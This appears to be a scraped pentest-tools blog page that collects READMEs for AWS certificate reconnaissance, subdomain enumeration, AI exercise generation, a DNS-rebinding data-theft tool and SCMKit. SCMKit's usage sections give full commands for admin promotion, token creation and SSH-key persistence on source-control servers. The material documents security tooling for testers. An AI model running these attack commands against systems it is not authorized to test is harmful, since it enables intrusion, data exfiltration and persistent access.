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CloudPulse - AWS Cloud Landscape Search Engine

By: Zion3R โ€” October 28th 2023 at 11:30

During the reconnaissance phase, an attacker searches for any information about his target to create a profile that will later help him to identify possible ways to get in an organization.
CloudPulse is a powerful tool that simplifies and enhances the analysis of SSL certificate data. It leverages the extensive repository of SSL certificates obtained from the AWS EC2 machines available at Trickest Cloud. With CloudPulse , security researchers can efficiently explore SSL certificate details, uncover potential vulnerabilities, and gather valuable insights for a variety of security-related tasks.

Simplifies security assessments with a user-friendly interface. It allows you to effortlessly find company's asset's on aws cloud:

  • IPs
  • subdomains
  • domains associated with a target
  • organization name
  • discover origin ips

1- Download CloudPulse :

git clone
cd CloudPulse/

2- Run docker compose :

docker-compose up -d

3- Run script

docker-compose exec web python

4 - Now go to http://:8000/search and enjoy the search engine

1- download CloudPulse :

git clone
cd CloudPulse/

2- Setup virtual environment :

python3 -m venv myenv
source myenv/bin/activate

3- Install requirements.txt file :

pip install -r requirements.txt

4- run an instance of elasticsearch using docker :

docker run -d --name elasticsearch -p 9200:9200 -e "discovery.type=single-node" elasticsearch:6.6.1

5- update and settings file to the host 'localhost':
es = Elasticsearch([{'host': 'localhost', 'port': 9200}])

'default': {
'hosts': 'localhost:9200'

6- Run to index data in elasticsearch:


7- Run the app:

python runserver 0:8000

Included in the CloudPulse repository is a sample data.csv file containing close to 4,000 records, which provides a glimpse of the tool's capabilities. For the full dataset, visit the Trickest Cloud repository clone the data and update data.csv file (it contains close to 9 millions data)

as an example searching for .mil data gives:

searching for tesla as en example gives :

CloudPulse heavily depends on the data.csv file, which is a sample dataset extracted from the larger collection maintained by Trickest. While the sample dataset provides valuable insights, the tool's full potential is realized when used in conjunction with the complete dataset, which is accessible in the Trickest repository here.
Users are encouraged to refer to the Trickest dataset for a more comprehensive and up-to-date analysis.

โ˜ โ˜† โœ‡ KitPloit - PenTest Tools!

Columbus-Server - API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features

By: Zion3R โ€” August 12th 2023 at 12:30

Columbus Project is an API first subdomain discovery service, blazingly fast subdomain enumeration service with advanced features.

Columbus returned 638 subdomains of in 0.231 sec.


By default Columbus returns only the subdomains in a JSON string array:

curl ''

But we think of the bash lovers, so if you don't want to mess with JSON and a newline separated list is your wish, then include the Accept: text/plain header.


curl -s -H "Accept: text/plain" "$DOMAIN" | \
while read SUB
if [[ "$SUB" == "" ]]
echo "$HOST"

For more, check the features or the API documentation.


Currently, entries are got from Certificate Transparency.

Command Line

Usage of columbus-server:
Check for updates.
-config string
Path to the config file.
Print version informations.

-check: Check the lates version on GitHub. Prints up-to-date and returns 0 if no update required. Prints the latest tag (eg.: v0.9.1) and returns 1 if new release available. In case of error, prints the error message and returns 2.


git clone
make build


Create a new user:

adduser --system --no-create-home --disabled-login columbus-server

Create a new group:

addgroup --system columbus

Add the new user to the new group:

usermod -aG columbus columbus-server

Copy the binary to /usr/bin/columbus-server.

Make it executable:

chmod +x /usr/bin/columbus-server

Create a directory:

mkdir /etc/columbus

Copy the config file to /etc/columbus/server.conf.

Set the permission to 0600.

chmod -R 0600 /etc/columbus

Set the owner of the config file:

chown -R columbus-server:columbus /etc/columbus

Install the service file (eg.: /etc/systemd/system/columbus-server.service).

cp columbus-server.service /etc/systemd/system/

Reload systemd:

systemctl daemon-reload

Start columbus:

systemctl start columbus-server

If you want to columbus start automatically:

systemctl enable columbus-server

โ˜ โ˜† โœ‡ KitPloit - PenTest Tools!

AiCEF - An AI-assisted cyber exercise content generation framework using named entity recognition

By: Zion3R โ€” August 6th 2023 at 12:30

AiCEF is a tool implementing the accompanying framework [1] in order to harness the intelligence that is available from online resources, as well as threat groups' activities, arsenal (eg. MITRE), to create relevant and timely cybersecurity exercise content. This way, we abstract the events from the reports in a machine-readable form. The produced graphs can be infused with additional intelligence, e.g. the threat actor profile from MITRE, also mapped in our ontology. While this may fill gaps that would be missing from a report, one can also manipulate the graph to create custom and unique models. Finally, we exploit transformer-based language models like GPT to convert the graph into text that can serve as the scenario of a cybersecurity exercise. We have tested and validated AiCEF with a group of experts in cybersecurity exercises, and the results clearly show that AiCEF significantly augments the capabilities in creating timely and relevant cybersecurity exercises in terms of both quality and time.

We used Python to create a machine-learning-powered Exercise Generation Framework and developed a set of tools to perform a set of individual tasks which would help an exercise planner (EP) to create a timely and targeted Cybersecurity Exercise Scenario, regardless of her experience.

Problems an Exercise Planner faces:

  • Constant table-top research to have fresh content
  • Realistic CSE scenario creation can be difficult and time-consuming
  • Meeting objectives but also keeping it appealing for the target audience
  • Is the relevance and timeliness aspects considered?
  • Can all the above be automated?

Our Main Objective: Build an AI powered tool that can generate relevant and up-to-date Cyber Exercise Content in a few steps with little technical expertise from the user.

Release Roadmap

The updated project, AiCEF v.2.0 is planned to be publicly released by the end of 2023, pending heavy code review and functionality updates. Submodules with reduced functinality will start being release by early June 2023. Thank you for your patience.


The most convenient way to install AiCEF is by using the docker-compose command. For production deployment, we advise you deploy MySQL manually in a dedicated environment and then to start the other components using Docker.

First, make sure you have docker-compose installed in your environment:


$ sudo apt-get install docker-compose

Then, clone the repository:

$ git clone /<choose-a-path>/AiCEF-docker
$ cd /<choose-a-path>/AiCEF-docker

Configure the environment settings

Import the MySQL file in your

$ mysql -u <your_username> รขโ‚ฌโ€œ-password=<your_password> AiCEF_db < AiCEF_db.sql 

Before running the docker-compose command, settings must be configured. Copy the sample settings file and change it accordingly to your needs.

$ cp .env.sample .env


Note: Make sure you have an OpenAI API key available. Load the environment setttings (including your MySQL connection details):

set -a ; source .env

Finally, run docker-compose in detached (-d) mode:

$ sudo docker-compose up -d


A common usage flow consists of generating a Trend Report to analyze patterns over time, parsing relevant articles and converting them into Incident Breadcrumbs using MLTP module and storing them in a knowledge database called KDb. Incidents are then generated using IncGen component and can be enhanced using the Graph Enhancer module to simulate known APT activity. The incidents come with injects that can be edited on the fly. The CSE scenario is then created using CEGen, which defines various attributes like CSE name, number of Events, and Incidents. MLCESO is a crucial step in the methodology where dedicated ML models are trained to extract information from the collected articles with over 80% accuracy. The Incident Generation & Enhancer (IncGen) workflow can be automated, generating a variety of incidents based on filtering parameters and the existing database. The knowledge database (KDB) consists of almost 3000 articles classified into six categories that can be augmented using APT Enhancer by using the activity of known APT groups from MITRE or manually.

Find below some sample usage screenshots:


  • An AI-powered Cyber Exercise Generation Framework
  • Developed in Python & EEL
  • Open source library Stixview
  • Stores data in MYSQL
  • API to Text Synthesis Models (ex. GPT-3.5)
  • Can create incidents based on TTPs of 125 known APT actors
  • Models Cyber Exercise Content in machine readable STIX2.1 [2] (.json) and human readable format (.pdf)


AiCEF is a product designed and developed by Alex Zacharis, Razvan Gavrila and Constantinos Patsakis.





Contributions are welcome! If you'd like to contribute to AiCEF v2.0, please follow these steps:

  1. Fork this repository
  2. Create a new branch (git checkout -b feature/your-branch-name)
  3. Make your changes and commit them (git commit -m 'Add some feature')
  4. Push to the branch (git push origin feature/your-branch-name)
  5. Open a new pull request


AiCEF is licensed under Attribution-NonCommercial 4.0 International (CC BY-NC 4.0) license. See for more information.

Under the following terms:

Attribution โ€” You must give appropriate credit, provide a link to the license, and indicate if changes were made. You may do so in any reasonable manner, but not in any way that suggests the licensor endorses you or your use. NonCommercial โ€” You may not use the material for commercial purposes. No additional restrictions โ€” You may not apply legal terms or technological measures that legally restrict others from doing anything the license permits.

โ˜ โ˜† โœ‡ KitPloit - PenTest Tools!

rebindMultiA - Tool To Perform a Multiple A Record Rebind Attack

By: Zion3R โ€” May 25th 2023 at 12:30

rebindMultiA is a tool to perform a Multiple A Record rebind attack. is a domain that I've set up to assist with these attacks. It makes every IP its own authoritative nameserver for the domain [IP] For example,'s authoritative nameserver is which resolves (as you might have guessed) to

Multiple A Record Rebind Attack

The MultiA Record Rebind attack is a variant of DNS Rebinding that weaponizes an attacker's ability to respond with two IP address in response to a DNS request and the browser's tendency to fallback to the second IP in the DNS response when the first one doesn't respond. In this attack, the attacker will configure a malicious DNS server and two malicious HTTP servers. The DNS server will respond with two A records: 0 IN A 0 IN A

The victim browser will then connect to the first IP and begin interacting with the attacker's first malicious HTTP server. This server will respond with a page that contains two iframes, one to /steal and one to /rebind. The /steal iframe will load up a malicious page to reach into the second iframe and grab the content. The /rebind endpoint, when hit, will issue a 302 redirect to / and kill the first malicious HTTP server. As a result, when the browser reaches back out to the attacker's HTTP server, it will be met with a closed port. As such, it will fallback to the second IP. Once the target content has been loaded in the second iframe, the first iframe can reach into it, steal the data, and exfiltrate it to the attacker's second malicious HTTP server - the callback server.

This attack only works in a Windows environment. Linux and Mac will default to the private IP first and the attacker's server will never be queried.

Graphic + Explaination

  1. The browser resolves the host
  2. The DNS server (included in parses the requested dns name and returns two A records: and
  3. The victim's browser reaches out the attacker's malicious HTTP server (included in and loads the /parent page which has two iframes.
  4. The victim's browser loads /steal from the attacker's malicious HTTP server.
  5. The victim's browser loads /rebind which results in a 302 redirect to / (the HTTP server will exit after this request).
  6. The victim's browser redirect's to / per the 302 from the attacker's server.
  7. The victim's browser attempts to load / from the attacker's (now dead) HTTP server, but fails to do so.
  8. The browser then shifts to the second IP in the DNS cache and resolves the hostname to It then reaches out to that server and loads up the page in the iframe.
  9. The attacker's steal iframe reaches into the newly loaded second iframe and grabs the content.
  10. The attacker's steal iframe then sends the results back to the attacker's callback server.


pip3 install -r requirements.txt
python3 --help
usage: [-h] [-p PORT] [-c CALLBACK_PORT] [-d DNS_PORT] [-f FILE] [-l LOCATION]

optional arguments:
-h, --help show this help message and exit
-p PORT, --port PORT Specify port to attack on targetIp. Default: 80
Specify the callback HTTP server port. Default: 31337
-d DNS_PORT, --dns-port DNS_PORT
Specify the DNS server port. Default: 53
-f FILE, --file FILE Specify the HTML file to display in the first iframe.(The "steal" iframe). Default: steal.html
-l LOCATION, --location LOCATION
Specify the location of the data you'd like to steal on the target. Default: /

If you get this error:

โ•ฐโ”€>$ python3

Traceback (most recent call last):
File "", line 2, in <module>
from http.server import HTTPServer, BaseHTTPRequestHandler, ThreadingHTTPServer
ImportError: cannot import name 'ThreadingHTTPServer'

Then you need to use a more up-to-date version of Python. Python 3.7+.

Quick Start

This must be executed from publically accessible IP.

git clone
cd rebindMutliA
pip3 install -r requirements.txt
echo "Send your victim to`curl -s` to exfil"
sudo python3

โ˜ โ˜† โœ‡ KitPloit - PenTest Tools!

SCMKit - Source Code Management Attack Toolkit

By: (Unknown) โ€” November 13th 2022 at 11:30

Source Code Management Attack Toolkit - SCMKit is a toolkit that can be used to attack SCM systems. SCMKit allows the user to specify the SCM system and attack module to use, along with specifying valid credentials (username/password or API key) to the respective SCM system. Currently, the SCM systems that SCMKit supports are GitHub Enterprise, GitLab Enterprise and Bitbucket Server. The attack modules supported include reconnaissance, privilege escalation and persistence. SCMKit was built in a modular approach, so that new modules and SCM systems can be added in the future by the information security community.


Libraries Used

The below 3rd party libraries are used in this project.

Library URL License
Octokit MIT License
Fody MIT License
GitLabApiClient MIT License
Newtonsoft.Json MIT License


  • Use the pre-compiled binary in Releases

Building Yourself

Take the below steps to setup Visual Studio in order to compile the project yourself. This requires a .NET library that can be installed from the NuGet package manager.

  • Load the Visual Studio project up and go to "Tools" --> "NuGet Package Manager" --> "Package Manager Settings"
  • Go to "NuGet Package Manager" --> "Package Sources"
  • Add a package source with the URL
  • Install the below NuGet packages
    • Install-Package Costura.Fody -Version 3.3.3
    • Install-Package Octokit
    • Install-Package GitLabApiClient
    • Install-Package Newtonsoft.Json
  • You can now build the project yourself!



  • -c, -credential - credential for authentication (username:password or apiKey)
  • -s, -system - system to attack (github,gitlab,bitbucket)
  • -u, -url - URL for GitHub Enterprise, GitLab Enterprise or Bitbucket Server
  • -m, -module - module to run
  • -o, -option - options (when applicable)

Systems (-s, -system)

  • github: GitHub Enterprise
  • gitlab: GitLab Enterprise
  • bitbucket: Bitbucket Server

Modules (-m, -module)

  • listrepo: list all repos the current user can see
  • searchrepo: search for a given repo
  • searchcode: search for code containing keyword search term
  • searchfile: search for filename containing keyword search term
  • listsnippet: list all snippets of current user
  • listrunner: list all GitLab runners available to current user
  • listgist: list all gists of current user
  • listorg: list all orgs current user belongs to
  • privs: get privs of current API token
  • addadmin: promote given user to admin role
  • removeadmin: demote given user from admin role
  • createpat: create personal access token for target user
  • listpat: list personal access tokens for a target user
  • removepat: remove personal access token for a target user
  • createsshkey: create SSH key for current user
  • listsshkey: list SSH keys for current user
  • removesshkey: remove SSH key for current user
  • adminstats: get admin stats (users, repos, orgs, gists)
  • protection: get branch protection settings

Module Details Table

The below table shows where each module is supported

Attack Scenario Module Requires Admin? GitHub Enterprise GitLab Enterprise Bitbucket Server
Reconnaissance listrepo No X X X
Reconnaissance searchrepo No X X X
Reconnaissance searchcode No X X X
Reconnaissance searchfile No X X X
Reconnaissance listsnippet No X
Reconnaissance listrunner No X
Reconnaissance listgist No X
Reconnaissance listorg No X
Reconnaissance privs No X X
Reconnaissance protection No X
Persistence listsshkey No X X X
Persistence removesshkey No X X X
Persistence createsshkey No X X X
Persistence listpat No X X
Persistence removepat No X X
Persistence createpat Yes (GitLab Enterprise only) X X
Privilege Escalation addadmin Yes X X X
Privilege Escalation removeadmin Yes X X X
Reconnaissance adminstats Yes X


List Repos

Use Case

Discover repositories being used in a particular SCM system


Provide the listrepo module, along with any relevant authentication information and URL. This will output the repository name and URL.

GitHub Enterprise

This will list all repositories that a user can see.

SCMKit.exe -s github -m listrepo -c userName:password -u https://github.something.local

SCMKit.exe -s github -m listrepo -c apiKey -u https://github.something.local

GitLab Enterprise

This will list all repositories that a user can see.

SCMKit.exe -s gitlab -m listrepo -c userName:password -u https://gitlab.something.local

SCMKit.exe -s gitlab -m listrepo -c apiKey -u https://gitlab.something.local

Bitbucket Server

This will list all repositories that a user can see.

SCMKit.exe -s bitbucket -m listrepo -c userName:password -u https://bitbucket.something.local

SCMKit.exe -s bitbucket -m listrepo -c apiKey -u https://bitbucket.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m listrepo -c username:password -u https://gitlab.hogwarts.local

Module: listrepo
System: gitlab
Auth Type: Username/Password
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/14/2022 8:30:47 PM

Name | Visibility | URL
MaraudersMap | Private | https://gitlab.hogwarts.local/hpotter/maraudersmap
testingStuff | Internal | https://gitlab.hogwarts.local/adumbledore/testingstuff
Spellbook | Internal | https://gitlab.hogwarts.local/hpotter/spellbook findShortestPathToGryffindorSword | Internal | https://gitlab.hogwarts.local/hpotter/findShortestPathToGryffindorSword
charms | Public | https://gitlab.hogwarts.local/hgranger/charms
Secret-Spells | Internal | https://gitlab.hogwarts.local/adumbledore/secret-spells
Monitoring | Internal | https://gitlab.hogwarts.local/gitlab-instance-10590c85/Monitoring

Search Repos

Use Case

Search for repositories by repository name in a particular SCM system


Provide the searchrepo module and your search criteria in the -o command-line switch, along with any relevant authentication information and URL. This will output the matching repository name and URL.

GitHub Enterprise

The GitHub repo search is a "contains" search where the string you enter it will search for repos with names that contain your search term.

SCMKit.exe -s github -m searchrepo -c userName:password -u https://github.something.local -o "some search term"

SCMKit.exe -s github -m searchrepo -c apikey -u https://github.something.local -o "some search term"

GitLab Enterprise

The GitLab repo search is a "contains" search where the string you enter it will search for repos with names that contain your search term.

SCMKit.exe -s gitlab -m searchrepo -c userName:password -u https://gitlab.something.local -o "some search term"

SCMKit.exe -s gitlab -m searchrepo -c apikey -u https://gitlab.something.local -o "some search term"

Bitbucket Server

The Bitbucket repo search is a "starts with" search where the string you enter it will search for repos with names that start with your search term.

SCMKit.exe -s bitbucket -m searchrepo -c userName:password -u https://bitbucket.something.local -o "some search term"

SCMKit.exe -s bitbucket -m searchrepo -c apikey -u https://bitbucket.something.local -o "some search term"

Example Output

Search Code

Use Case

Search for code containing a given keyword in a particular SCM system


Provide the searchcode module and your search criteria in the -o command-line switch, along with any relevant authentication information and URL. This will output the URL to the matching code file, along with the line in the code that matched.

GitHub Enterprise

The GitHub code search is a "contains" search where the string you enter it will search for code that contains your search term in any line.

SCMKit.exe -s github -m searchcode -c userName:password -u https://github.something.local -o "some search term"

SCMKit.exe -s github -m searchcode -c apikey -u https://github.something.local -o "some search term"

GitLab Enterprise

The GitLab code search is a "contains" search where the string you enter it will search for code that contains your search term in any line.

SCMKit.exe -s gitlab -m searchcode -c userName:password -u https://gitlab.something.local -o "some search term"

SCMKit.exe -s gitlab -m searchcode -c apikey -u https://gitlab.something.local -o "some search term"

Bitbucket Server

The Bitbucket code search is a "contains" search where the string you enter it will search for code that contains your search term in any line.

SCMKit.exe -s bitbucket -m searchcode -c userName:password -u https://bitbucket.something.local -o "some search term"

SCMKit.exe -s bitbucket -m searchcode -c apikey -u https://bitbucket.something.local -o "some search term"

Example Output

Search Files

Use Case

Search for files in repositories containing a given keyword in the file name in a particular SCM system


Provide the searchfile module and your search criteria in the -o command-line switch, along with any relevant authentication information and URL. This will output the URL to the matching file in its respective repository.

GitHub Enterprise

The GitLab file search is a "contains" search where the string you enter it will search for files that contains your search term in the file name.

SCMKit.exe -s github -m searchfile -c userName:password -u https://github.something.local -o "some search term"

SCMKit.exe -s github -m searchfile -c apikey -u https://github.something.local -o "some search term"

GitLab Enterprise

The GitLab file search is a "contains" search where the string you enter it will search for files that contains your search term in the file name.

SCMKit.exe -s gitlab -m searchfile -c userName:password -u https://gitlab.something.local -o "some search term"

SCMKit.exe -s gitlab -m searchfile -c apikey -u https://gitlab.something.local -o "some search term"

Bitbucket Server

The Bitbucket file search is a "contains" search where the string you enter it will search for files that contains your search term in the file name.

SCMKit.exe -s bitbucket -m searchfile -c userName:password -u https://bitbucket.something.local -o "some search term"

SCMKit.exe -s bitbucket -m searchfile -c apikey -u https://bitbucket.something.local -o "some search term"

Example Output

C:\source\SCMKit\SCMKit\bin\Release>SCMKit.exe -s bitbucket -m searchfile -c apikey -u http://bitbucket.hogwarts.local:7990 -o jenkinsfile

Module: searchfile
System: bitbucket
Auth Type: API Key
Options: jenkinsfile
Target URL: http://bitbucket.hogwarts.local:7990

Timestamp: 1/14/2022 10:17:59 PM

[>] REPO: http://bitbucket.hogwarts.local:7990/scm/~HPOTTER/hpotter
[>] FILE: Jenkinsfile

[>] REPO: http://bitbucket.hogwarts.local:7990/scm/STUD/cred-decryption
[>] FILE: subDir/Jenkinsfile

Total matching results: 2

List Snippets

Use Case

List snippets owned by the current user in GitLab


Provide the listsnippet module, along with any relevant authentication information and URL.

GitLab Enterprise

SCMKit.exe -s gitlab -m listsnippet -c userName:password -u https://gitlab.something.local

SCMKit.exe -s gitlab -m listsnippet -c apikey -u https://gitlab.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m listsnippet -c username:password -u https://gitlab.hogwarts.local

Module: listsnippet
System: gitlab
Auth Type: Username/Password
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/14/2022 9:17:36 PM

Title | Raw URL
spell-script | https://gitlab.hogwarts.local/-/snippets/2/raw

List Runners

Use Case

List all GitLab runners available to the current user in GitLab


Provide the listrunner module, along with any relevant authentication information and URL. If the user is an administrator, you will be able to list all runners within the GitLab Enterprise instance, which includes shared and group runners.

GitLab Enterprise

SCMKit.exe -s gitlab -m listrunner -c userName:password -u https://gitlab.something.local

SCMKit.exe -s gitlab -m listrunner -c apikey -u https://gitlab.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m listrunner -c username:password -u https://gitlab.hogwarts.local

Module: listrunner
System: gitlab
Auth Type: Username/Password
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/25/2022 11:40:08 AM

ID | Name | Repo Assigned
2 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/spellbook.git
3 | gitlab-runner | https://gitlab.hogwarts.local/hpotter/maraudersmap.git

List Gists

Use Case

List gists owned by the current user in GitHub


Provide the listgist module, along with any relevant authentication information and URL.

GitHub Enterprise

SCMKit.exe -s github -m listgist -c userName:password -u https://github.something.local

SCMKit.exe -s github -m listgist -c apikey -u https://github.something.local

Example Output

C:\>SCMKit.exe -s github -m listgist -c username:password -u https://github-enterprise.hogwarts.local

Module: listgist
System: github
Auth Type: Username/Password
Target URL: https://github-enterprise.hogwarts.local

Timestamp: 1/14/2022 9:43:23 PM

Description | Visibility | URL
Shell Script to Decode Spell | public | https://github-enterprise.hogwarts.local/gist/c11c6bb3f47fe67183d5bc9f048412a1

List Orgs

Use Case

List all organizations the current user belongs to in GitHub


Provide the listorg module, along with any relevant authentication information and URL.

GitHub Enterprise

SCMKit.exe -s github -m listorg -c userName:password -u https://github.something.local

SCMKit.exe -s github -m listorg -c apiKey -u https://github.something.local

Example Output

C:\>SCMKit.exe -s github -m listorg -c username:password -u https://github-enterprise.hogwarts.local

Module: listorg
System: github
Auth Type: Username/Password
Target URL: https://github-enterprise.hogwarts.local

Timestamp: 1/14/2022 9:44:48 PM

Name | URL
Hogwarts | https://github-enterprise.hogwarts.local/api/v3/orgs/Hogwarts/repos

Get Privileges of API Token

Use Case

Get the assigned privileges to an access token being used in a particular SCM system


Provide the privs module, along with an API key and URL.

GitHub Enterprise

SCMKit.exe -s github -m privs -c apiKey -u https://github.something.local

GitLab Enterprise

SCMKit.exe -s gitlab -m privs -c apiKey -u https://gitlab.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m privs -c apikey -u https://gitlab.hogwarts.local

Module: privs
System: gitlab
Auth Type: API Key
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/14/2022 9:18:27 PM

Token Name | Active? | Privilege | Description
hgranger-api-token | True | api | Read-write for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_user | Read-only for endpoints under /users. Essentially, access to any of the GET requests in the Users API.
hgranger-api-token | True | read_api | Read-only for the complete API, including all groups and projects, the Container Registry, and the Package Registry.
hgranger-api-token | True | read_repository | Read-only (pull) for the repository through git clone.
hgranger-api-token | True | write_repository | Read-write (pull, push) for the repository through git clone. Required for accessing Git repositories over HTTP when 2FA is enabled.

Add Admin

Use Case

Promote a normal user to an administrative role in a particular SCM system


Provide the addadmin module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to add an administrative role to.

GitHub Enterprise

SCMKit.exe -s github -m addadmin -c userName:password -u https://github.something.local -o targetUserName

SCMKit.exe -s github -m addadmin -c apikey -u https://github.something.local -o targetUserName

GitLab Enterprise

SCMKit.exe -s gitlab -m addadmin -c userName:password -u https://gitlab.something.local -o targetUserName

SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.something.local -o targetUserName

Bitbucket Server

Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.

SCMKit.exe -s bitbucket -m addadmin -c userName:password -u https://bitbucket.something.local -o targetUserName

Example Output

C:\>SCMKit.exe -s gitlab -m addadmin -c apikey -u https://gitlab.hogwarts.local -o hgranger

Module: addadmin
System: gitlab
Auth Type: API Key
Options: hgranger
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/14/2022 9:19:32 PM

[+] SUCCESS: The hgranger user was successfully added to the admin role.

Remove Admin

Use Case

Demote an administrative user to a normal user role in a particular SCM system


Provide the removeadmin module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to remove an administrative role from.

GitHub Enterprise

SCMKit.exe -s github -m removeadmin -c userName:password -u https://github.something.local -o targetUserName

SCMKit.exe -s github -m removeadmin -c apikey -u https://github.something.local -o targetUserName

GitLab Enterprise

SCMKit.exe -s gitlab -m removeadmin -c userName:password -u https://gitlab.something.local -o targetUserName

SCMKit.exe -s gitlab -m removeadmin -c apikey -u https://gitlab.something.local -o targetUserName

Bitbucket Server

Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.

SCMKit.exe -s bitbucket -m removeadmin -c userName:password -u https://bitbucket.something.local -o targetUserName

Example Output

C:\>SCMKit.exe -s gitlab -m removeadmin -c username:password -u https://gitlab.hogwarts.local -o hgranger

Module: removeadmin
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/14/2022 9:20:12 PM

[+] SUCCESS: The hgranger user was successfully removed from the admin role.

Create Access Token

Use Case

Create an access token to be used in a particular SCM system


Provide the createpat module, along with any relevant authentication information and URL. Additionally, provide the target user you would like to create an access token for.

GitLab Enterprise

This can only be performed as an administrator. You will provide the username that you would like to create a PAT for.

SCMKit.exe -s gitlab -m createpat -c userName:password -u https://gitlab.something.local -o targetUserName

SCMKit.exe -s gitlab -m createpat -c apikey -u https://gitlab.something.local -o targetUserName

Bitbucket Server

Creates PAT for the current user authenticating as. In Bitbucket you cannot create a PAT for another user, even as an admin. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the PAT ID that is shown after being created. You will need this when you need to remove the PAT in the future.

SCMKit.exe -s bitbucket -m createpat -c userName:password -u https://bitbucket.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m createpat -c username:password -u https://gitlab.hogwarts.local -o hgranger

Module: createpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/20/2022 1:51:23 PM

ID | Name | Token
59 | SCMKIT-AaCND | R3ySx_8HUn6UQ_6onETx

[+] SUCCESS: The hgranger user personal access token was successfully added.

List Access Tokens

Use Case

List access tokens for a user on a particular SCM system


Provide the listpat module, along with any relevant authentication information and URL.

GitLab Enterprise

Only requires admin if you want to list another user's PAT's. A regular user can list their own PAT's.

SCMKit.exe -s gitlab -m listpat -c userName:password -u https://gitlab.something.local -o targetUser

SCMKit.exe -s gitlab -m listpat -c apikey -u https://gitlab.something.local -o targetUser

Bitbucket Server

List access tokens for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.

SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local

List access tokens for another user (requires admin). Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.

SCMKit.exe -s bitbucket -m listpat -c userName:password -u https://bitbucket.something.local -o targetUser

Example Output

C:\>SCMKit.exe -s gitlab -m listpat -c username:password -u https://gitlab.hogwarts.local -o hgranger

Module: listpat
System: gitlab
Auth Type: Username/Password
Options: hgranger
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/20/2022 1:54:41 PM

ID | Name | Active? | Scopes
59 | SCMKIT-AaCND | True | api, read_repository, write_repository

Remove Access Token

Use Case

Remove an access token for a user in a particular SCM system


Provide the removepat module, along with any relevant authentication information and URL. Additionally, provide the target user PAT ID you would like to remove an access token for.

GitLab Enterprise

Only requires admin if you want to remove another user's PAT. A regular user can remove their own PAT. You have to provide the PAT ID to remove. This ID was shown whenever you created the PAT and also when you listed the PAT.

SCMKit.exe -s gitlab -m removepat -c userName:password -u https://gitlab.something.local -o patID

SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.something.local -o patID

Bitbucket Server

Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. You have to provide the PAT ID to remove. This ID was shown whenever you created the PAT.

SCMKit.exe -s bitbucket -m removepat -c userName:password -u https://bitbucket.something.local -o patID

Example Output

C:\>SCMKit.exe -s gitlab -m removepat -c apikey -u https://gitlab.hogwarts.local -o 58

Module: removepat
System: gitlab
Auth Type: API Key
Options: 59
Target URL: https://gitlab.hogwarts.local

Timestamp: 1/20/2022 1:56:47 PM

[*] INFO: Revoking personal access token of ID: 59

[+] SUCCESS: The personal access token of ID 59 was successfully revoked.

Create SSH Key

Use Case

Create an SSH key to be used in a particular SCM system


Provide the createsshkey module, along with any relevant authentication information and URL.

GitHub Enterprise

Creates SSH key for the current user authenticating as.

SCMKit.exe -s github -m createsshkey -c userName:password -u https://github.something.local -o "ssh public key"

SCMKit.exe -s github -m createsshkey -c apiToken -u https://github.something.local -o "ssh public key"

GitLab Enterprise

Creates SSH key for the current user authenticating as. Take note of the SSH key ID that is shown after being created. You will need this when you need to remove the SSH key in the future.

SCMKit.exe -s gitlab -m createsshkey -c userName:password -u https://gitlab.something.local -o "ssh public key"

SCMKit.exe -s gitlab -m createsshkey -c apiToken -u https://gitlab.something.local -o "ssh public key"

Bitbucket Server

Creates SSH key for the current user authenticating as. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket. Take note of the SSH key ID that is shown after being created. You will need this when you need to remove the SSH key in the future.

SCMKit.exe -s bitbucket -m createsshkey -c userName:password -u https://bitbucket.something.local -o "ssh public key"

Example Output

List SSH Keys

Use Case

List SSH keys for a user on a particular SCM system


Provide the listsshkey module, along with any relevant authentication information and URL.

GitHub Enterprise

List SSH keys for current user. This will include SSH key ID's, which is needed when you would want to remove an SSH key.

SCMKit.exe -s github -m listsshkey -c userName:password -u https://github.something.local

SCMKit.exe -s github -m listsshkey -c apiToken -u https://github.something.local

GitLab Enterprise

List SSH keys for current user.

SCMKit.exe -s gitlab -m listsshkey -c userName:password -u https://gitlab.something.local

SCMKit.exe -s gitlab -m listsshkey -c apiToken -u https://gitlab.something.local

Bitbucket Server

List SSH keys for current user. Only username/password auth is supported to perform actions not related to repos or projects in Bitbucket.

SCMKit.exe -s bitbucket -m listsshkey -c userName:password -u https://bitbucket.something.local

Example Output

C:\>SCMKit.exe -s gitlab -m listsshkey -u http://gitlab.hogwarts.local -c apiToken

Module: listsshkey
System: gitlab
Auth Type: API Key
Target URL: https://gitlab.hogwarts.local

Timestamp: 2/7/2022 4:09:40 PM

SSH Key ID | SSH Key Value | Title
9 | .....p50edigBAF4lipVZkAM= | SCMKIT-RLzie
10 | .....vGJLPGHiTwIxW9i+xAs= | SCMKIT-muFGU

Remove SSH Key

Use Case

Remove an SSH key for a user in a particular SCM system


Provide the removesshkey module, along with any relevant authentication information and URL. Additionally, provide the target user SSH key ID to remove.

GitHub Enterprise

You have to provide the SSH key ID to remove. This ID was shown whenever you list SSH keys.

SCMKit.exe -s github -m removesshkey -c userName:password -u https://github.something.local -o sshKeyID

